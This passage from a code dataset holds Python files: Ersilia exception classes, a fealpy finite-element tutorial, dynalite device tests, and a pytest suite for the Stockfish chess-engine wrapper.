ErsiliaError.__init__(self, self.message, self.hints)\n\n\nclass ModelNotAvailableLocallyError(ErsiliaError):\n def __init__(self, model):\n self.model = model\n self.message = (\n \"Model {0} is not available locally, so it cannot be served\".format(\n self.model\n )\n )\n self.hints = \"Fetch the model using the CLI. Simply run:\\n\"\n self.hints += \"$ ersilia fetch {0}\".format(self.model)\n ErsiliaError.__init__(self, self.message, self.hints)\n\n\nclass EmptyOutputError(ErsiliaError):\n def __init__(self, model_id, api_name):\n self.model_id = model_id\n self.api_name = api_name\n self.message = \"Model API {0}:{1} did not produce an output\".format(\n self.model_id, self.api_name\n )\n log = self.run_from_terminal()\n self.message += log\n self.hints = \"- Visit the fetch troubleshooting site\"\n ErsiliaError.__init__(self, self.message, self.hints)\n\n def run_from_terminal(self):\n eb = ErsiliaBase()\n bundle_dir = eb._get_bundle_location(model_id=self.model_id)\n framework_dir = os.path.join(\n bundle_dir, self.model_id, \"artifacts\", \"framework\"\n )\n bash_executables = [\"run.sh\", \"run_predict.sh\", \"run_calculate.sh\"]\n for exec_file in os.listdir(framework_dir):\n if exec_file in bash_executables:\n break\n exec_file = os.path.join(framework_dir, exec_file)\n input_file = os.path.join(framework_dir, \"example_input.csv\")\n output_file = os.path.join(framework_dir, \"example_output.csv\")\n tmp_folder = tempfile.mkdtemp(prefix=\"ersilia-\")\n log_file = os.path.join(tmp_folder, \"terminal.log\")\n run_command(\"ersilia example {0} -n 3 -f {1}\".format(self.model_id, input_file))\n cmd = \"bash {0} {1} {2} {3} 2>&1 | tee -a {4}\".format(\n exec_file, framework_dir, input_file, output_file, log_file\n )\n run_command(cmd)\n with open(log_file, \"r\") as f:\n log = f.read()\n return log\n","repo_name":"ersilia-os/ersilia","sub_path":"ersilia/utils/exceptions_utils/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":3975,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"37"} +{"seq_id":"40711916104","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.sparse.linalg import spsolve\n\nfrom fealpy.pde.poisson_2d import CosCosData\n\nfrom fealpy.functionspace import LagrangeFiniteElementSpace\n\nfrom fealpy.boundarycondition import DirichletBC\n\n\npde = CosCosData()\n\nmesh = pde.init_mesh(n=5, meshtype='tri')\n\nspace = LagrangeFiniteElementSpace(mesh, p=1)\n\nuh = space.function() # (NN, )\n\nA = space.stiff_matrix()\nF = space.source_vector(pde.source)\n\nbc = DirichletBC(space, pde.dirichlet)\n\nA, F = bc.apply(A, F, uh)\n\nuh[:] = spsolve(A, F)\n\nL2error = space.integralalg.error(pde.solution, uh) # L_2 error\nH1error = space.integralalg.error(pde.gradient, uh.grad_value)\n\nprint(L2error)\nprint(H1error)\n\n\nuh.add_plot(plt, cmap='rainbow')\nplt.show()\n\n\n","repo_name":"weihuayi/fealpy","sub_path":"tutorial/step_2.py","file_name":"step_2.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"} +{"seq_id":"15230552168","text":"\"\"\"Tests for DynaliteDevices.\"\"\"\n\nimport pytest\n\nimport dynalite_devices_lib.const as dyn_const\nfrom dynalite_devices_lib.dynet import DynetPacket\nfrom dynalite_devices_lib.opcodes import OpcodeType\n\nfrom .common import packet_notification, preset_notification\n\n\ndef preset_select_func(area, preset):\n \"\"\"Create preset selection packet.\"\"\"\n return DynetPacket.select_area_preset_packet(area, preset, 0)\n\n\ndef linear_func(area, preset):\n \"\"\"Create preset linear fade packet.\"\"\"\n return DynetPacket(\n area=area, command=OpcodeType.LINEAR_PRESET.value, data=[preset - 1, 0, 0]\n )\n\n\ndef report_func(area, preset):\n \"\"\"Create preset report packet.\"\"\"\n return DynetPacket.report_area_preset_packet(area, preset)\n\n\ndef set_channel_func(area, channel):\n \"\"\"Create channel set level packet.\"\"\"\n return DynetPacket.set_channel_level_packet(area, channel, 1, 0)\n\n\ndef report_channel_func(area, channel):\n \"\"\"Create channel report level packet.\"\"\"\n return DynetPacket.report_channel_level_packet(area, channel, 1, 1)\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\n \"conf, packet_func\",\n [\n (dyn_const.CONF_PRESET, preset_select_func),\n (dyn_const.CONF_PRESET, linear_func),\n (dyn_const.CONF_PRESET, report_func),\n (dyn_const.CONF_CHANNEL, set_channel_func),\n (dyn_const.CONF_CHANNEL, report_channel_func),\n ],\n)\nasync def test_selections(mock_gateway, conf, packet_func):\n \"\"\"Run preset / channel selection tests with various commands.\"\"\"\n devices = mock_gateway.configure_dyn_dev(\n {\n dyn_const.CONF_ACTIVE: False,\n dyn_const.CONF_AREA: {\"2\": {conf: {i: {} for i in range(1, 9)}}},\n dyn_const.CONF_PRESET: {},\n },\n 8,\n )\n for device in devices:\n assert not device.is_on\n assert await mock_gateway.async_setup_dyn_dev()\n await mock_gateway.check_single_update(None)\n for i in range(1, 9):\n packet = packet_func(2, i)\n await mock_gateway.receive(packet)\n exp_notifications = [packet_notification(packet.raw_msg)]\n if conf == dyn_const.CONF_CHANNEL:\n await mock_gateway.check_single_update(devices[i - 1])\n assert devices[i - 1].is_on\n else: # CONF_PRESET\n await mock_gateway.check_updates(devices)\n for j in range(1, 9):\n assert devices[j - 1].is_on == (i == j)\n exp_notifications.append(preset_notification(2, i))\n await mock_gateway.check_notifications(exp_notifications)\n\n\n@pytest.mark.asyncio\nasync def test_inbound_request_channel_level(mock_gateway):\n \"\"\"Test when the network requests a channel level. Nothing to do, just be sure nothing bad happens...\"\"\"\n [device] = mock_gateway.configure_dyn_dev(\n {\n dyn_const.CONF_ACTIVE: False,\n dyn_const.CONF_AREA: {\"3\": {dyn_const.CONF_CHANNEL: {\"5\": {}}}},\n dyn_const.CONF_PRESET: {},\n },\n 1,\n )\n assert not device.is_on\n assert await mock_gateway.async_setup_dyn_dev()\n await mock_gateway.check_single_update(None)\n packet = DynetPacket.request_channel_level_packet(3, 5)\n await mock_gateway.receive(packet)\n await mock_gateway.check_notifications([packet_notification(packet.raw_msg)])\n assert not device.is_on\n","repo_name":"ziv1234/python-dynalite-devices","sub_path":"tests/test_inbound.py","file_name":"test_inbound.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"28361868031","text":"import pytest\nfrom timeit import default_timer\nimport time\n\nfrom stockfish import Stockfish, StockfishException\n\n\nclass TestStockfish:\n @pytest.fixture\n def stockfish(self):\n return Stockfish()\n\n def test_get_best_move_first_move(self, stockfish):\n best_move = stockfish.get_best_move()\n assert best_move in (\n \"e2e3\",\n \"e2e4\",\n \"g1f3\",\n \"b1c3\",\n \"d2d4\",\n )\n\n def test_get_best_move_time_first_move(self, stockfish):\n best_move = stockfish.get_best_move_time(1000)\n assert best_move in (\"e2e3\", \"e2e4\", \"g1f3\", \"b1c3\", \"d2d4\")\n\n def test_get_best_move_remaining_time_first_move(self, stockfish):\n best_move = stockfish.get_best_move(wtime=1000)\n assert best_move in (\"a2a3\", \"d2d4\", \"e2e4\", \"g1f3\", \"c2c4\")\n best_move = stockfish.get_best_move(btime=1000)\n assert best_move in (\"g1f3\", \"d2d4\", \"e2e4\", \"c2c4\")\n best_move = stockfish.get_best_move(wtime=1000, btime=1000)\n assert best_move in (\"g2g3\", \"g1f3\", \"e2e4\", \"d2d4\", \"c2c4\", \"e2e3\")\n best_move = stockfish.get_best_move(wtime=5 * 60 * 1000, btime=1000)\n assert best_move in (\"e2e3\", \"e2e4\", \"g1f3\", \"b1c3\", \"d2d4\")\n\n def test_set_position_resets_info(self, stockfish):\n stockfish.set_position([\"e2e4\", \"e7e6\"])\n stockfish.get_best_move()\n assert stockfish.info != \"\"\n stockfish.set_position([\"e2e4\", \"e7e6\"])\n assert stockfish.info == \"\"\n\n def test_get_best_move_not_first_move(self, stockfish):\n stockfish.set_position([\"e2e4\", \"e7e6\"])\n best_move = stockfish.get_best_move()\n assert best_move in (\"d2d4\", \"g1f3\")\n\n def test_get_best_move_time_not_first_move(self, stockfish):\n stockfish.set_position([\"e2e4\", \"e7e6\"])\n best_move = stockfish.get_best_move_time(1000)\n assert best_move in (\"d2d4\", \"g1f3\")\n\n def test_get_best_move_remaining_time_not_first_move(self, stockfish):\n stockfish.set_position([\"e2e4\", \"e7e6\"])\n best_move = stockfish.get_best_move(wtime=1000)\n assert best_move in (\"d2d4\", \"a2a3\", \"d1e2\", \"b1c3\")\n best_move = stockfish.get_best_move(btime=1000)\n assert best_move in (\"d2d4\", \"b1c3\")\n best_move = stockfish.get_best_move(wtime=1000, btime=1000)\n assert best_move in (\"d2d4\", \"b1c3\", \"g1f3\")\n best_move = stockfish.get_best_move(wtime=5 * 60 * 1000, btime=1000)\n assert best_move in (\"e2e3\", \"e2e4\", \"g1f3\", \"b1c3\", \"d2d4\")\n\n def test_get_best_move_checkmate(self, stockfish):\n stockfish.set_position([\"f2f3\", \"e7e5\", \"g2g4\", \"d8h4\"])\n assert stockfish.get_best_move() is None\n\n def test_get_best_move_time_checkmate(self, stockfish):\n stockfish.set_position([\"f2f3\", \"e7e5\", \"g2g4\", \"d8h4\"])\n assert stockfish.get_best_move_time(1000) is None\n\n def test_get_best_move_remaining_time_checkmate(self, stockfish):\n stockfish.set_position([\"f2f3\", \"e7e5\", \"g2g4\", \"d8h4\"])\n assert stockfish.get_best_move(wtime=1000) is None\n assert stockfish.get_best_move(btime=1000) is None\n assert stockfish.get_best_move(wtime=1000, btime=1000) is None\n assert stockfish.get_best_move(wtime=5 * 60 * 1000, btime=1000) is None\n\n def test_set_fen_position(self, stockfish):\n stockfish.set_fen_position(\n \"7r/1pr1kppb/2n1p2p/2NpP2P/5PP1/1P6/P6K/R1R2B2 w - - 1 27\"\n )\n assert stockfish.is_move_correct(\"f4f5\") is True\n assert stockfish.is_move_correct(\"a1c1\") is False\n\n def test_castling(self, stockfish):\n assert stockfish.is_move_correct(\"e1g1\") is False\n stockfish.set_fen_position(\n \"rnbqkbnr/ppp3pp/3ppp2/8/4P3/5N2/PPPPBPPP/RNBQK2R w KQkq - 0 4\"\n )\n assert stockfish.is_move_correct(\"e1g1\") is True\n\n def test_set_fen_position_mate(self, stockfish):\n stockfish.set_fen_position(\"8/8/8/6pp/8/4k1PP/8/r3K3 w - - 12 53\")\n assert stockfish.get_best_move() is None\n assert stockfish.info == \"info depth 0 score mate 0\"\n\n def test_clear_info_after_set_new_fen_position(self, stockfish):\n stockfish.set_fen_position(\"8/8/8/6pp/8/4k1PP/r7/4K3 b - - 11 52\")\n stockfish.get_best_move()\n stockfish.set_fen_position(\"8/8/8/6pp/8/4k1PP/8/r3K3 w - - 12 53\")\n assert stockfish.info == \"\"\n\n stockfish.set_fen_position(\"8/8/8/6pp/8/4k1PP/r7/4K3 b - - 11 52\")\n stockfish.get_best_move()\n stockfish.set_fen_position(\"8/8/8/6pp/8/4k1PP/8/r3K3 w - - 12 53\", False)\n assert stockfish.info == \"\"\n\n def test_set_fen_position_starts_new_game(self, stockfish):\n stockfish.set_fen_position(\n \"7r/1pr1kppb/2n1p2p/2NpP2P/5PP1/1P6/P6K/R1R2B2 w - - 1 27\"\n )\n stockfish.get_best_move()\n assert stockfish.info != \"\"\n stockfish.set_fen_position(\"3kn3/p5rp/1p3p2/3B4/3P1P2/2P5/1P3K2/8 w - - 0 53\")\n assert stockfish.info == \"\"\n\n def test_set_fen_position_second_argument(self, stockfish):\n stockfish.set_depth(16)\n stockfish.set_fen_position(\n \"rnbqk2r/pppp1ppp/3bpn2/8/3PP3/2N5/PPP2PPP/R1BQKBNR w KQkq - 0 1\", True\n )\n assert stockfish.get_best_move() == \"e4e5\"\n\n stockfish.set_fen_position(\n \"rnbqk2r/pppp1ppp/3bpn2/4P3/3P4/2N5/PPP2PPP/R1BQKBNR b KQkq - 0 1\", False\n )\n assert stockfish.get_best_move() == \"d6e7\"\n\n stockfish.set_fen_position(\n \"rnbqk2r/pppp1ppp/3bpn2/8/3PP3/2N5/PPP2PPP/R1BQKBNR w KQkq - 0 1\", False\n )\n assert stockfish.get_best_move() == \"e4e5\"\n\n def test_is_move_correct_first_move(self, stockfish):\n assert stockfish.is_move_correct(\"e2e1\") is False\n assert stockfish.is_move_correct(\"a2a3\") is True\n\n def test_is_move_correct_not_first_move(self, stockfish):\n stockfish.set_position([\"e2e4\", \"e7e6\"])\n assert stockfish.is_move_correct(\"e2e1\") is False\n assert stockfish.is_move_correct(\"a2a3\") is True\n\n @pytest.mark.parametrize(\n \"value\",\n [\n \"info\",\n \"depth\",\n \"seldepth\",\n \"multipv\",\n \"score\",\n \"mate\",\n \"-1\",\n \"nodes\",\n \"nps\",\n \"tbhits\",\n \"time\",\n \"pv\",\n \"h2g1\",\n \"h4g3\",\n ],\n )\n def test_last_info(self, stockfish, value):\n stockfish.set_fen_position(\"r6k/6b1/2b1Q3/p6p/1p5q/3P2PP/5r1K/8 w - - 1 31\")\n stockfish.get_best_move()\n assert value in stockfish.info\n\n def test_set_skill_level(self, stockfish):\n stockfish.set_fen_position(\n \"rnbqkbnr/ppp2ppp/3pp3/8/4P3/5N2/PPPP1PPP/RNBQKB1R w KQkq - 0 1\"\n )\n\n assert stockfish.get_parameters()[\"Skill Level\"] == 20\n\n stockfish.set_skill_level(1)\n assert stockfish.get_best_move() in (\n \"b2b3\",\n \"d2d3\",\n \"d2d4\",\n \"b1c3\",\n \"d1e2\",\n \"g2g3\",\n \"c2c4\",\n \"f1e2\",\n \"c2c3\",\n \"h2h3\",\n )\n assert stockfish.get_parameters()[\"Skill Level\"] == 1\n assert stockfish.get_parameters()[\"UCI_LimitStrength\"] == \"false\"\n\n stockfish.set_skill_level(20)\n assert stockfish.get_best_move() in (\"d2d4\", \"c2c4\")\n assert stockfish.get_parameters()[\"Skill Level\"] == 20\n assert stockfish.get_parameters()[\"UCI_LimitStrength\"] == \"false\"\n\n def test_set_elo_rating(self, stockfish):\n stockfish.set_fen_position(\n \"rnbqkbnr/ppp2ppp/3pp3/8/4P3/5N2/PPPP1PPP/RNBQKB1R w KQkq - 0 1\"\n )\n\n assert stockfish.get_parameters()[\"UCI_Elo\"] == 1350\n\n stockfish.set_elo_rating(2000)\n assert stockfish.get_best_move() in (\n \"d2d4\",\n \"b1c3\",\n \"d1e2\",\n \"c2c4\",\n \"f1e2\",\n \"h2h3\",\n \"c2c3\",\n \"f1d3\",\n \"a2a3\",\n )\n assert stockfish.get_parameters()[\"UCI_Elo\"] == 2000\n assert stockfish.get_parameters()[\"UCI_LimitStrength\"] == \"true\"\n\n stockfish.set_elo_rating(1350)\n assert stockfish.get_best_move() in (\n \"d1e2\",\n \"b1c3\",\n \"d2d3\",\n \"d2d4\",\n \"c2c4\",\n \"f1e2\",\n \"c2c3\",\n \"f1b5\",\n \"g2g3\",\n \"h2h3\",\n )\n assert stockfish.get_parameters()[\"UCI_Elo\"] == 1350\n assert stockfish.get_parameters()[\"UCI_LimitStrength\"] == \"true\"\n\n stockfish.set_elo_rating(2850)\n major_version = stockfish.get_stockfish_major_version()\n\n expected_best_moves = [\"d2d4\", \"b1c3\", \"c2c3\", \"c2c4\", \"f1b5\", \"f1e2\"]\n if major_version >= 12 and not stockfish.is_development_build_of_engine():\n expected_best_moves.remove(\"f1e2\")\n\n assert stockfish.get_best_move() in expected_best_moves\n\n assert stockfish.get_parameters()[\"UCI_Elo\"] == 2850\n\n def test_specific_params(self, stockfish):\n old_parameters = {\n \"Debug Log File\": \"\",\n \"Contempt\": 0,\n \"Min Split Depth\": 0,\n \"Threads\": 1,\n \"Ponder\": \"false\",\n \"Hash\": 16,\n \"MultiPV\": 1,\n \"Skill Level\": 20,\n \"Move Overhead\": 10,\n \"Minimum Thinking Time\": 20,\n \"Slow Mover\": 100,\n \"UCI_Chess960\": \"false\",\n \"UCI_LimitStrength\": \"false\",\n \"UCI_Elo\": 1350,\n }\n expected_parameters = old_parameters.copy()\n stockfish.set_skill_level(1)\n expected_parameters[\"Skill Level\"] = 1\n assert stockfish.get_parameters() == expected_parameters\n assert stockfish._DEFAULT_STOCKFISH_PARAMS == old_parameters\n stockfish.set_skill_level(20)\n expected_parameters[\"Skill Level\"] = 20\n assert stockfish.get_parameters() == old_parameters\n assert stockfish._DEFAULT_STOCKFISH_PARAMS == old_parameters\n\n stockfish.update_engine_parameters({\"Threads\": 4})\n expected_parameters[\"Threads\"] = 4\n assert stockfish.get_parameters() == expected_parameters\n stockfish.update_engine_parameters({\"Hash\": 128})\n expected_parameters[\"Hash\"] = 128\n assert stockfish.get_parameters() == expected_parameters\n stockfish.update_engine_parameters({\"Hash\": 256, \"Threads\": 3})\n expected_parameters.update({\"Hash\": 256, \"Threads\": 3})\n assert stockfish.get_parameters() == expected_parameters\n\n def test_chess960_position(self, stockfish):\n assert \"KQkq\" in stockfish.get_fen_position()\n old_parameters = stockfish.get_parameters()\n expected_parameters = stockfish.get_parameters()\n expected_parameters[\"UCI_Chess960\"] = \"true\"\n stockfish.update_engine_parameters({\"UCI_Chess960\": \"true\"})\n assert \"HAha\" in stockfish.get_fen_position()\n assert stockfish.get_parameters() == expected_parameters\n stockfish.set_fen_position(\"4rkr1/4p1p1/8/8/8/8/8/4nK1R w K - 0 100\")\n assert stockfish.get_best_move() == \"f1h1\"\n assert stockfish.get_evaluation() == {\"type\": \"mate\", \"value\": 2}\n assert stockfish.will_move_be_a_capture(\"f1h1\") is Stockfish.Capture.NO_CAPTURE\n assert (\n stockfish.will_move_be_a_capture(\"f1e1\") is Stockfish.Capture.DIRECT_CAPTURE\n )\n stockfish.update_engine_parameters({\"UCI_Chess960\": \"false\"})\n assert stockfish.get_parameters() == old_parameters\n assert stockfish.get_best_move() == \"f1g1\"\n assert stockfish.get_evaluation() == {\"type\": \"mate\", \"value\": 2}\n assert stockfish.will_move_be_a_capture(\"f1g1\") is Stockfish.Capture.NO_CAPTURE\n\n def test_get_board_visual_white(self, stockfish):\n stockfish.set_position([\"e2e4\", \"e7e6\", \"d2d4\", \"d7d5\"])\n if stockfish.get_stockfish_major_version() >= 12:\n expected_result = (\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| r | n | b | q | k | b | n | r | 8\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| p | p | p | | | p | p | p | 7\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | | p | | | | 6\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | p | | | | | 5\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | P | P | | | | 4\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | | | | | | 3\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| P | P | P | | | P | P | P | 2\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| R | N | B | Q | K | B | N | R | 1\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \" a b c d e f g h\\n\"\n )\n else:\n expected_result = (\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| r | n | b | q | k | b | n | r |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| p | p | p | | | p | p | p |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | | p | | | |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | p | | | | |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | P | P | | | |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | | | | | |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| P | P | P | | | P | P | P |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| R | N | B | Q | K | B | N | R |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n )\n\n assert stockfish.get_board_visual() == expected_result\n\n stockfish._put(\"d\")\n stockfish._read_line() # skip a line\n assert \"+---+---+---+\" in stockfish._read_line()\n # Tests that the previous call to get_board_visual left no remaining lines to be read. This means\n # the second line read after stockfish._put(\"d\") now will be the +---+---+---+ of the new outputted board.\n\n def test_get_board_visual_black(self, stockfish):\n stockfish.set_position([\"e2e4\", \"e7e6\", \"d2d4\", \"d7d5\"])\n if stockfish.get_stockfish_major_version() >= 12:\n expected_result = (\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| R | N | B | K | Q | B | N | R | 1\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| P | P | P | | | P | P | P | 2\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | | | | | | 3\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | P | P | | | | 4\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | | p | | | | 5\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | p | | | | | 6\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| p | p | p | | | p | p | p | 7\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| r | n | b | k | q | b | n | r | 8\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \" h g f e d c b a\\n\"\n )\n else:\n expected_result = (\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| R | N | B | K | Q | B | N | R |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| P | P | P | | | P | P | P |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | | | | | |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | P | P | | | |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | | p | | | |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| | | | p | | | | |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| p | p | p | | | p | p | p |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n \"| r | n | b | k | q | b | n | r |\\n\"\n \"+---+---+---+---+---+---+---+---+\\n\"\n )\n\n assert stockfish.get_board_visual(False) == expected_result\n\n stockfish._put(\"d\")\n stockfish._read_line() # skip a line\n assert \"+---+---+---+\" in stockfish._read_line()\n # Tests that the previous call to get_board_visual left no remaining lines to be read. This means\n # the second line read after stockfish._put(\"d\") now will be the +---+---+---+ of the new outputted board.\n\n def test_get_fen_position(self, stockfish):\n assert (\n stockfish.get_fen_position()\n == \"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1\"\n )\n stockfish._put(\"d\")\n stockfish._read_line() # skip a line\n assert \"+---+---+---+\" in stockfish._read_line()\n\n def test_get_fen_position_after_some_moves(self, stockfish):\n stockfish.set_position([\"e2e4\", \"e7e6\"])\n assert (\n stockfish.get_fen_position()\n == \"rnbqkbnr/pppp1ppp/4p3/8/4P3/8/PPPP1PPP/RNBQKBNR w KQkq - 0 2\"\n )\n\n def test_get_stockfish_major_version(self, stockfish):\n assert (\n stockfish.get_stockfish_major_version() in (8, 9, 10, 11, 12, 13, 14, 15)\n ) != stockfish.is_development_build_of_engine()\n\n def test_get_evaluation_cp(self, stockfish):\n stockfish.set_depth(20)\n stockfish.set_fen_position(\n \"r4rk1/pppb1p1p/2nbpqp1/8/3P4/3QBN2/PPP1BPPP/R4RK1 w - - 0 11\"\n )\n evaluation = stockfish.get_evaluation()\n assert (\n evaluation[\"type\"] == \"cp\"\n and evaluation[\"value\"] >= 60\n and evaluation[\"value\"] <= 150\n )\n\n def test_get_evaluation_checkmate(self, stockfish):\n stockfish.set_fen_position(\"1nb1k1n1/pppppppp/8/6r1/5bqK/6r1/8/8 w - - 2 2\")\n assert stockfish.get_evaluation() == {\"type\": \"mate\", \"value\": 0}\n\n def test_get_evaluation_stalemate(self, stockfish):\n stockfish.set_fen_position(\"1nb1kqn1/pppppppp/8/6r1/5b1K/6r1/8/8 w - - 2 2\")\n assert stockfish.get_evaluation() == {\"type\": \"cp\", \"value\": 0}\n\n def test_set_depth(self, stockfish):\n stockfish.set_depth(12)\n assert stockfish.depth == \"12\"\n stockfish.get_best_move()\n assert \"depth 12\" in stockfish.info\n\n def test_get_best_move_wrong_position(self, stockfish):\n stockfish.set_depth(2)\n wrong_fen = \"3kk3/8/8/8/8/8/8/3KK3 w - - 0 0\"\n stockfish.set_fen_position(wrong_fen)\n assert stockfish.get_best_move() in (\n \"d1e2\",\n \"d1c1\",\n \"d1c2\",\n )\n\n def test_constructor(self, stockfish):\n # Will also use a new stockfish instance in order to test sending\n # params to the constructor.\n\n stockfish_2 = Stockfish(\n depth=16, parameters={\"MultiPV\": 2, \"UCI_Elo\": 2850, \"UCI_Chess960\": \"true\"}\n )\n assert (\n stockfish_2.get_fen_position()\n == \"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w HAha - 0 1\"\n )\n assert (\n stockfish.get_fen_position()\n == \"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1\"\n )\n\n stockfish_2.get_best_move()\n stockfish.get_best_move()\n assert \"multipv 2\" in stockfish_2.info\n assert \"depth 16\" in stockfish_2.info\n assert stockfish_2.depth == \"16\"\n assert \"multipv 1\" in stockfish.info\n assert \"depth 15\" in stockfish.info\n assert stockfish.depth == \"15\"\n\n stockfish_1_params = stockfish.get_parameters()\n stockfish_2_params = stockfish_2.get_parameters()\n for key in stockfish_2_params.keys():\n if key == \"MultiPV\":\n assert stockfish_2_params[key] == 2\n assert stockfish_1_params[key] == 1\n elif key == \"UCI_Elo\":\n assert stockfish_2_params[key] == 2850\n assert stockfish_1_params[key] == 1350\n elif key == \"UCI_LimitStrength\":\n assert stockfish_2_params[key] == \"true\"\n assert stockfish_1_params[key] == \"false\"\n elif key == \"UCI_Chess960\":\n assert stockfish_2_params[key] == \"true\"\n assert stockfish_1_params[key] == \"false\"\n else:\n assert stockfish_2_params[key] == stockfish_1_params[key]\n\n def test_parameters_functions(self, stockfish):\n old_parameters = stockfish.get_parameters()\n stockfish.set_fen_position(\"4rkr1/4p1p1/8/8/8/8/8/5K1R w H - 0 100\")\n assert stockfish.get_best_move() == \"f1g1\" # ensures Chess960 param is false.\n assert stockfish.get_fen_position() == \"4rkr1/4p1p1/8/8/8/8/8/5K1R w K - 0 100\"\n assert \"multipv 1\" in stockfish.info\n stockfish.update_engine_parameters(\n {\n \"Minimum Thinking Time\": 10,\n \"Hash\": 32,\n \"MultiPV\": 2,\n \"UCI_Chess960\": \"true\",\n }\n )\n assert stockfish.get_fen_position() == \"4rkr1/4p1p1/8/8/8/8/8/5K1R w H - 0 100\"\n assert stockfish.get_best_move() == \"f1h1\"\n assert \"multipv 2\" in stockfish.info\n updated_parameters = stockfish.get_parameters()\n for key, value in updated_parameters.items():\n if key == \"Minimum Thinking Time\":\n assert value == 10\n elif key == \"Hash\":\n assert value == 32\n elif key == \"MultiPV\":\n assert value == 2\n elif key == \"UCI_Chess960\":\n assert value == \"true\"\n else:\n assert updated_parameters[key] == old_parameters[key]\n assert stockfish.get_parameters()[\"UCI_LimitStrength\"] == \"false\"\n stockfish.update_engine_parameters({\"UCI_Elo\": 2000, \"Skill Level\": 19})\n assert stockfish.get_parameters()[\"UCI_Elo\"] == 2000\n assert stockfish.get_parameters()[\"Skill Level\"] == 19\n assert stockfish.get_parameters()[\"UCI_LimitStrength\"] == \"false\"\n stockfish.update_engine_parameters({\"UCI_Elo\": 2000})\n assert stockfish.get_parameters()[\"UCI_LimitStrength\"] == \"true\"\n stockfish.update_engine_parameters({\"Skill Level\": 20})\n assert stockfish.get_parameters()[\"UCI_LimitStrength\"] == \"false\"\n assert stockfish.get_fen_position() == \"4rkr1/4p1p1/8/8/8/8/8/5K1R w H - 0 100\"\n stockfish.reset_engine_parameters()\n assert stockfish.get_parameters() == old_parameters\n assert stockfish.get_fen_position() == \"4rkr1/4p1p1/8/8/8/8/8/5K1R w K - 0 100\"\n with pytest.raises(ValueError):\n stockfish.update_engine_parameters({\"Not an existing key\", \"value\"})\n\n def test_get_top_moves(self, stockfish):\n stockfish.set_depth(15)\n stockfish._set_option(\"MultiPV\", 4)\n stockfish.set_fen_position(\"1rQ1r1k1/5ppp/8/8/1R6/8/2r2PPP/4R1K1 w - - 0 1\")\n assert stockfish.get_top_moves(2) == [\n {\"Move\": \"e1e8\", \"Centipawn\": None, \"Mate\": 1},\n {\"Move\": \"c8e8\", \"Centipawn\": None, \"Mate\": 2},\n ]\n stockfish.set_fen_position(\"8/8/8/8/8/3r2k1/8/6K1 w - - 0 1\")\n assert stockfish.get_top_moves(2) == [\n {\"Move\": \"g1f1\", \"Centipawn\": None, \"Mate\": -2},\n {\"Move\": \"g1h1\", \"Centipawn\": None, \"Mate\": -1},\n ]\n\n def test_get_top_moves_mate(self, stockfish):\n stockfish.set_depth(10)\n stockfish._set_option(\"MultiPV\", 3)\n stockfish.set_fen_position(\"8/8/8/8/8/6k1/8/3r2K1 w - - 0 1\")\n assert stockfish.get_top_moves() == []\n assert stockfish.get_parameters()[\"MultiPV\"] == 3\n\n def test_get_top_moves_raising_error(self, stockfish):\n stockfish.set_fen_position(\n \"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1\"\n )\n with pytest.raises(ValueError):\n stockfish.get_top_moves(0)\n assert len(stockfish.get_top_moves(2)) == 2\n assert stockfish.get_parameters()[\"MultiPV\"] == 1\n\n def test_make_moves_from_current_position(self, stockfish):\n stockfish.set_fen_position(\n \"r1bqkb1r/pppp1ppp/2n2n2/1B2p3/4P3/5N2/PPPP1PPP/RNBQK2R w KQkq - 0 1\"\n 